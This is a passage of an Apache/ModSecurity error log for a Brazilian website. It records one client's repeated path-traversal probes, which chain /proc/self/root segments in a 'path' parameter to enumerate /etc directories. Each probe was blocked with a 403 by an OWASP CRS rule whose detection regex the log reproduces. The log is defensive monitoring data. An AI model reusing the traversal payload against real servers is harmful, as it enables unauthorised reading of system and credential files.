"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpVNY0UrI5A3LftIwLIgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:51.415832 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:50518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpVtY0UrI5A3LftIwLJAAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:52.703012 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.241.31:50522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpWIh-PF_25v4hFRB48QAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:54.125795 2026] [proxy_fcgi:error] [pid 25048:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57398] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:19:54.581000 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:50532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpWsU6Sx0TG1YjmQi8dgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:56.208271 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.241.31:50542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpXHIk7brgkOH-rIWZ2wAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:57.527163 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:54150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpXXIk7brgkOH-rIWZ3AAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:59.942485 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:54154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpX_PqhzTj3BvfDX-VkQAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:01.296472 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:54162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpYda6ubjKNq_cu4YWaQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:03.259435 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.241.31:54164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpY64xEDsg_V3ESNZZTAAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:04.233513 2026] [access_compat:error] [pid 29151:tid 140411624429312] [client 216.73.216.191:57158] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/buy.php
[Tue Mar 17 16:20:05.027322 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.241.31:54172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpZQeiSKl8TjouI-Yl-gAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:06.422127 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:54180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpZqBJNF7axNlVR0UmfwAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:07.723306 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:35958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpZxj0p0SRWAqcjGGHlAAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:09.089616 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:35970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpada6ubjKNq_cu4YWbQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:11.303570 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:35984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpata6ubjKNq_cu4YWbgAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:12.612681 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:35986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpbNa6ubjKNq_cu4YWcgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:13.962037 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:36000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpbQeiSKl8TjouI-Yl_gAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:15.269676 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:36014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpbxj0p0SRWAqcjGGHlgAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:16.075271 2026] [proxy_fcgi:error] [pid 29151:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57716] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:20:16.547883 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:36026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpcNY0UrI5A3LftIwLJwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:17.831779 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:48644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpcYh-PF_25v4hFRB5CgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:19.151675 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:48654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpc6BJNF7axNlVR0UmgwAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:20.916436 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:48664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpdPPqhzTj3BvfDX-VmQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:22.409698 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.241.31:48670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpdsU6Sx0TG1YjmQi8gwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
